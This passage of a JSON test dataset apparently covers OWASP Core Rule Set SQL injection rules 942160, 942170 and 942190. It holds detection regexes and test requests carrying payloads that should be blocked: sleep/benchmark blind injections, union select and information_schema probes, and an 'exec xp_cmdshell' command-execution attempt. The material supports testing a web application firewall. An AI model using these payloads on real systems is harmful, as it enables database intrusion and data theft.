"expected": { "should_block": true, "rule_ids": [ 942160 ] }, "malicious_patterns": [ { "location": "post_body", "value": "pay=BeNChMaRK(1000000, md5 AND 9796=4706('')" } ] }, { "description": "Detect blind SQLi attack in REQUEST_BASENAME. Issue #1904", "test_id": 10, "request": { "method": "GET", "uri": "/get/if(now()=sysdate(),sleep(12),0)", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942160 ] }, "malicious_patterns": [] }, { "description": "Detect blind SQLi attack in REQUEST_FILENAME. Issue #3779", "test_id": 11, "request": { "method": "GET", "uri": "/get/if(now()=sysdate(),sleep(12),0)/", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942160 ] }, "malicious_patterns": [] }, { "description": "Detect blind SQLi attack in REQUEST_FILENAME. Issue #3779 - Negative test (invalid benchmark syntax)", "test_id": 12, "request": { "method": "GET", "uri": "/BENChmARk(2999/**/999,Md5(/", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 942160 ] }, "malicious_patterns": [] }, { "description": "Detect blind SQLi attack in REQUEST_FILENAME. Issue #3779", "test_id": 13, "request": { "method": "GET", "uri": "/get/if(now()=sysdate(),sleep(/*comment*/12),0)/", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942160 ] }, "malicious_patterns": [] }, { "description": "SQL Injection Attack: Time-Based Payload Detected via Sleep Function\ndecoded payload: sELecT slEep (20 dIv 3)\n", "test_id": 14, "request": { "method": "GET", "uri": "/get?sql_table=sELecT%20slEep%20%2820%20dIv%203%29", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942160 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "sql_table=sELecT%20slEep%20%2820%20dIv%203%29" } ] }, { "description": "SQL Injection Attack: Time-Based Payload Detected via Sleep Function\ndecoded payload: SeleCT sLeEp (mOD(10,5))\n", "test_id": 15, "request": { "method": "GET", "uri": "/get?sql_table=SeleCT%20sLeEp%20%28mOD%2810%2C5%29%29", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942160 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "sql_table=SeleCT%20sLeEp%20%28mOD%2810%2C5%29%29" } ] }, { "description": "SQL Injection Attack: Time-Based Payload Detected via Sleep Function\ndecoded payload: sELecT slEep (5 ^ 2)\n", "test_id": 16, "request": { "method": "GET", "uri": "/get?sql_table=sELecT%20slEep%20%285%20%5E%202%29", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942160 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "sql_table=sELecT%20slEep%20%285%20%5E%202%29" } ] }, { "description": "SQL Injection Attack: Time-Based Payload Detected via Sleep Function\ndecoded payload: sELecT slEep (3 * 2)\n", "test_id": 17, "request": { "method": "GET", "uri": "/get?sql_table=sELecT%20slEep%20%283%20%2A%202%29", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942160 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "sql_table=sELecT%20slEep%20%283%20%2A%202%29" } ] }, { "description": "SQL Injection Attack: Time-Based Payload Detected via Sleep Function\ndecoded payload: sELecT slEep (-3 * -2)\n", "test_id": 18, "request": { "method": "GET", "uri": "/get?sql_table=sELecT%20slEep%20%28-3%20%2A%20-2%29", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942160 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "sql_table=sELecT%20slEep%20%28-3%20%2A%20-2%29" } ] }, { "description": "SQL Injection Attack: Time-Based Payload Detected via Sleep Function\ndecoded payload: sELecT slEep (10 /6)\n", "test_id": 19, "request": { "method": "GET", "uri": "/get?sql_table=sELecT%20slEep%20%2810%20%2F6%29", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942160 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "sql_table=sELecT%20slEep%20%2810%20%2F6%29" } ] }, { "description": "SQL Injection Attack: Time-Based Payload Detected via Sleep Function\ndecoded payload: sELecT slEep ('10€@#={},~2')\n", "test_id": 20, "request": { "method": "GET", "uri": "/get?sql_table=sELecT%20slEep%20%28%2710%E2%82%AC%40%23%3D%7B%7D%2C~2%27%29", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942160 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "sql_table=sELecT%20slEep%20%28%2710%E2%82%AC%40%23%3D%7B%7D%2C~2%27%29" } ] }, { "description": "SQL Injection Attack: Time-Based Payload Detected via Sleep Function\ndecoded payload: sELecT slEep (\"10\")\n", "test_id": 21, "request": { "method": "GET", "uri": "/get?sql_table=sELecT%20slEep%20%28%2210%22%29", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942160 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "sql_table=sELecT%20slEep%20%28%2210%22%29" } ] }, { "description": "SQL Injection Attack: Time-Based Payload Detected via Sleep Function\ndecoded payload: sELecT slEep (10 +6)\n", "test_id": 22, "request": { "method": "GET", "uri": "/get?sql_table=sELecT%20slEep%20%2810%20%2B6%29", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942160 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "sql_table=sELecT%20slEep%20%2810%20%2B6%29" } ] }, { "description": "SQL Injection Attack: Time-Based Payload Detected via Sleep Function\ndecoded payload: sELecT slEep (10 -6)\n", "test_id": 23, "request": { "method": "GET", "uri": "/get?sql_table=sELecT%20slEep%20%2810%20-6%29", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942160 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "sql_table=sELecT%20slEep%20%2810%20-6%29" } ] }, { "description": "SQL Injection Attack: Time-Based Payload Detected via Sleep Function\ndecoded payload: sELecT slEep (10.2)\n", "test_id": 24, "request": { "method": "GET", "uri": "/get?sql_table=sELecT%20slEep%20%2810.2%29", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942160 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "sql_table=sELecT%20slEep%20%2810.2%29" } ] }, { "description": "SQL Injection Attack: Time-Based Payload Detected via Sleep Function\ndecoded payload: sELecT slEep (20 % 7)\n", "test_id": 25, "request": { "method": "GET", "uri": "/get?sql_table=sELecT%20slEep%20%2820%20%25%207%29", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942160 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "sql_table=sELecT%20slEep%20%2820%20%25%207%29" } ] }, { "description": "SQL Injection Attack: Time-Based Payload Detected via Sleep Function with comments\ndecoded payload: selEct(/*te\"$%st*/sleep(/*te'e*st2*/10));\n", "test_id": 26, "request": { "method": "GET", "uri": "/get?sql_table=selEct%28%2F%2Ate%22%24%25st%2A%2Fsleep%28%2F%2Ate%27e%2Ast2%2A%2F10%29%29%3B", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942160 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "sql_table=selEct%28%2F%2Ate%22%24%25st%2A%2Fsleep%28%2F%2Ate%27e%2Ast2%2A%2F10%29%29%3B" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 154, "variables": [ { "variable": "REQUEST_FILENAME", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_COOKIES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_COOKIES_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "XML", "variable_part": "/*", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "(?i:sleep\\s*?\\(.*?\\)|benchmark\\s*?\\(.*?\\,.*?\\))", "actions": [ { "act_name": "id", "lineno": 155, "act_quote": "no_quote", "act_arg": "942160", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 156, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 157, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 158, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 159, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 159, "act_quote": "no_quote", "act_arg": "urlDecodeUni", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 159, "act_quote": "no_quote", "act_arg": "replaceComments", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 160, "act_quote": "quotes", "act_arg": "Detects blind sqli tests using sleep() or benchmark()", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 161, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 162, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 163, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 164, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 165, "act_quote": "quotes", "act_arg": "attack-sqli", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 166, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 167, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 168, "act_quote": "quotes", "act_arg": "OWASP_CRS/ATTACK-SQLI", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 169, "act_quote": "quotes", "act_arg": "capec/1000/152/248/66", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 170, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 171, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 172, "act_quote": "quotes", "act_arg": "tx.sql_injection_score=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 173, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 154 } }, { "rule_id": "942170", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_COOKIES", "part": "", "negated": false }, { "name": "REQUEST_COOKIES_NAMES", "part": "", "negated": false }, { "name": "ARGS_NAMES", "part": "", "negated": false }, { "name": "ARGS", "part": "", "negated": false }, { "name": "XML", "part": "/*", "negated": false } ], "operator": { "type": "@rx", "argument": "(?i)(?:select|;)[\\s\\x0b]+(?:benchmark|if|sleep)[\\s\\x0b]*?\\([\\s\\x0b]*?\\(?[\\s\\x0b]*?[0-9A-Z_a-z]+", "negated": false } }, "transformations": [ "none", "urlDecodeUni" ], "metadata": { "phase": "2", "message": "Detects SQL benchmark and sleep injection attempts including conditional queries", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-sqli" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-sqli", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/ATTACK-SQLI", "capec/1000/152/248/66" ] }, "test_cases": [ { "description": "Detects SQL benchmark and sleep injection attempts including conditional queries: 'SELECT BENCHMARK(1000000,1+1);'", "test_id": 1, "request": { "method": "GET", "uri": "/get?var=SELECT%20BENCHMARK%281000000%2C1%2B1%29%3B", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942170 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "var=SELECT%20BENCHMARK%281000000%2C1%2B1%29%3B" } ] }, { "description": "Detects SQL benchmark and sleep injection attempts including conditional queries: '; sleep(0)'", "test_id": 2, "request": { "method": "GET", "uri": "/get?var=%3B%20sleep%280%29", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942170 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "var=%3B%20sleep%280%29" } ] }, { "description": "Detects SQL benchmark and sleep injection attempts including conditional queries: negative test", "test_id": 3, "request": { "method": "GET", "uri": "/get?var=I%20sleep%20well%21", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": false, "rule_ids": [ 942170 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "var=I%20sleep%20well%21" } ] }, { "description": "Status Page Test - SQL injection test with select if(x", "test_id": 4, "request": { "method": "GET", "uri": "/get?test=select+if(x", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942170 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "test=select+if(x" } ] } ], "raw_rule": { "type": "SecRule", "lineno": 180, "variables": [ { "variable": "REQUEST_COOKIES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "REQUEST_COOKIES_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS_NAMES", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "ARGS", "variable_part": "", "quote_type": "no_quote", "negated": false, "counter": false }, { "variable": "XML", "variable_part": "/*", "quote_type": "no_quote", "negated": false, "counter": false } ], "operator": "@rx", "operator_argument": "(?i)(?:select|;)[\\s\\x0b]+(?:benchmark|if|sleep)[\\s\\x0b]*?\\([\\s\\x0b]*?\\(?[\\s\\x0b]*?[0-9A-Z_a-z]+", "actions": [ { "act_name": "id", "lineno": 181, "act_quote": "no_quote", "act_arg": "942170", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "phase", "lineno": 182, "act_quote": "no_quote", "act_arg": "2", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "block", "lineno": 183, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "capture", "lineno": 184, "act_quote": "no_quote", "act_arg": "", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 185, "act_quote": "no_quote", "act_arg": "none", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "t", "lineno": 185, "act_quote": "no_quote", "act_arg": "urlDecodeUni", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "msg", "lineno": 186, "act_quote": "quotes", "act_arg": "Detects SQL benchmark and sleep injection attempts including conditional queries", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "logdata", "lineno": 187, "act_quote": "quotes", "act_arg": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 188, "act_quote": "quotes", "act_arg": "application-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 189, "act_quote": "quotes", "act_arg": "language-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 190, "act_quote": "quotes", "act_arg": "platform-multi", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 191, "act_quote": "quotes", "act_arg": "attack-sqli", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 192, "act_quote": "quotes", "act_arg": "paranoia-level/1", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 193, "act_quote": "quotes", "act_arg": "OWASP_CRS", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 194, "act_quote": "quotes", "act_arg": "OWASP_CRS/ATTACK-SQLI", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "tag", "lineno": 195, "act_quote": "quotes", "act_arg": "capec/1000/152/248/66", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "ver", "lineno": 196, "act_quote": "quotes", "act_arg": "OWASP_CRS/4.21.0-dev", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "severity", "lineno": 197, "act_quote": "quotes", "act_arg": "CRITICAL", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 198, "act_quote": "quotes", "act_arg": "tx.sql_injection_score=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" }, { "act_name": "setvar", "lineno": 199, "act_quote": "quotes", "act_arg": "tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}", "act_arg_val": "", "act_arg_val_param": "", "act_arg_val_param_val": "" } ], "chained": false, "operator_negated": false, "oplineno": 180 } }, { "rule_id": "942190", "has_tests": true, "detection": { "variables": [ { "name": "REQUEST_COOKIES", "part": "", "negated": false }, { "name": "REQUEST_COOKIES_NAMES", "part": "", "negated": false }, { "name": "ARGS_NAMES", "part": "", "negated": false }, { "name": "ARGS", "part": "", "negated": false }, { "name": "XML", "part": "/*", "negated": false } ], "operator": { "type": "@rx", "argument": "(?i)[\\\"'`](?:[\\s\\x0b]*![\\s\\x0b]*[\\\"'0-9A-Z_-z]|;?[\\s\\x0b]*(?:having|select|union\\b[\\s\\x0b]*(?:all|(?:distin|sele)ct))\\b[\\s\\x0b]*[^\\s\\x0b])|\\b(?:(?:(?:c(?:onnection_id|urrent_user)|database|schema|user)[\\s\\x0b]*?|select.*?[0-9A-Z_a-z]?user)\\(|exec(?:ute)?[\\s\\x0b]+master\\.|from[^0-9A-Z_a-z]+information_schema[^0-9A-Z_a-z]|into[\\s\\x0b\\+]+(?:dump|out)file[\\s\\x0b]*?[\\\"'`]|union(?:[\\s\\x0b]select[\\s\\x0b]@|[\\s\\x0b\\(0-9A-Z_a-z]*?select))|[\\s\\x0b]*?exec(?:ute)?.*?[^0-9A-Z_a-z]xp_cmdshell|[^0-9A-Z_a-z]iif[\\s\\x0b]*?\\(", "negated": false } }, "transformations": [ "none", "urlDecodeUni", "removeCommentsChar" ], "metadata": { "phase": "2", "message": "Detects MSSQL code execution and information gathering attempts", "logdata": "Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}", "version": "OWASP_CRS/4.21.0-dev" }, "attack_info": { "type": [ "attack-sqli" ], "severity": "CRITICAL", "tags": [ "application-multi", "language-multi", "platform-multi", "attack-sqli", "paranoia-level/1", "OWASP_CRS", "OWASP_CRS/ATTACK-SQLI", "capec/1000/152/248/66" ] }, "test_cases": [ { "description": "MSSQL code execution and information gathering attempts", "test_id": 1, "request": { "method": "GET", "uri": "/get?var=%20exec%20xp_cmdshell", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "" }, "expected": { "should_block": true, "rule_ids": [ 942190 ] }, "malicious_patterns": [ { "location": "uri_params", "value": "var=%20exec%20xp_cmdshell" } ] }, { "description": "MSSQL Code Execution and Information gathering attempts", "test_id": 2, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "%22%21%22%0A" }, "expected": { "should_block": true, "rule_ids": [ 942190 ] }, "malicious_patterns": [ { "location": "post_body", "value": "%22%21%22%0A" } ] }, { "description": "MSSQL Code Execution and Information gathering attempts", "test_id": 3, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "%22+union+select%0A" }, "expected": { "should_block": true, "rule_ids": [ 942190 ] }, "malicious_patterns": [ { "location": "post_body", "value": "%22+union+select%0A" } ] }, { "description": "MSSQL Code Execution and Information gathering attempts", "test_id": 4, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "current_user%28%0A" }, "expected": { "should_block": true, "rule_ids": [ 942190 ] }, "malicious_patterns": [ { "location": "post_body", "value": "current_user%28%0A" } ] }, { "description": "MSSQL Code Execution and Information gathering attempts", "test_id": 5, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "FROM+INFORMATION_SCHEMA.%0A" }, "expected": { "should_block": true, "rule_ids": [ 942190 ] }, "malicious_patterns": [ { "location": "post_body", "value": "FROM+INFORMATION_SCHEMA.%0A" } ] }, { "description": "MSSQL Code Execution and Information gathering attempts", "test_id": 6, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "%27%3BSELECT+P%0A" }, "expected": { "should_block": true, "rule_ids": [ 942190 ] }, "malicious_patterns": [ { "location": "post_body", "value": "%27%3BSELECT+P%0A" } ] }, { "description": "MSSQL Code Execution and Information gathering attempts", "test_id": 7, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "UnIon+seleCt%0A" }, "expected": { "should_block": true, "rule_ids": [ 942190 ] }, "malicious_patterns": [ { "location": "post_body", "value": "UnIon+seleCt%0A" } ] }, { "description": "MSSQL Code Execution and Information gathering attempts", "test_id": 8, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "%27union%20select%2F%0A" }, "expected": { "should_block": true, "rule_ids": [ 942190 ] }, "malicious_patterns": [ { "location": "post_body", "value": "%27union%20select%2F%0A" } ] }, { "description": "MSSQL Code Execution and Information gathering attempts", "test_id": 9, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "from+information_schema.%0A" }, "expected": { "should_block": true, "rule_ids": [ 942190 ] }, "malicious_patterns": [ { "location": "post_body", "value": "from+information_schema.%0A" } ] }, { "description": "MSSQL Code Execution and Information gathering attempts", "test_id": 10, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "select%5D%3Dpolygon%28%28%2F%2A%2100000select%2A%2F%2A%2F%2A%2100000from%2A%2F%28%2F%2A%2100000select%2A%2F%2A%2F%2A%2100000from%2A%2F%28%2F%2A%2100000select%2A%2Fconcat_ws%280x7e3a%2C0x6d616b6d616e%2Cversion%28%29%2Cuser%28%0A" }, "expected": { "should_block": true, "rule_ids": [ 942190 ] }, "malicious_patterns": [ { "location": "post_body", "value": "select%5D%3Dpolygon%28%28%2F%2A%2100000select%2A%2F%2A%2F%2A%2100000from%2A%2F%28%2F%2A%2100000select%2A%2F%2A%2F%2A%2100000from%2A%2F%28%2F%2A%2100000select%2A%2Fconcat_ws%280x7e3a%2C0x6d616b6d616e%2Cversion%28%29%2Cuser%28%0A" } ] }, { "description": "MSSQL Code Execution and Information gathering attempts", "test_id": 11, "request": { "method": "POST", "uri": "/post", "headers": { "Host": "localhost", "User-Agent": "OWASP CRS test agent", "Accept": "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" }, "data": "user%28%0A" }, "expected": { "should_block": true, "rule_ids": [ 942190 ] }, "malicious_patterns": [ { "location": "post_body", "value": "user%28%0A" } ] }, { "description": "MSSQL Code Execution and Information gathering attempts", "test_id": 12, "request": { 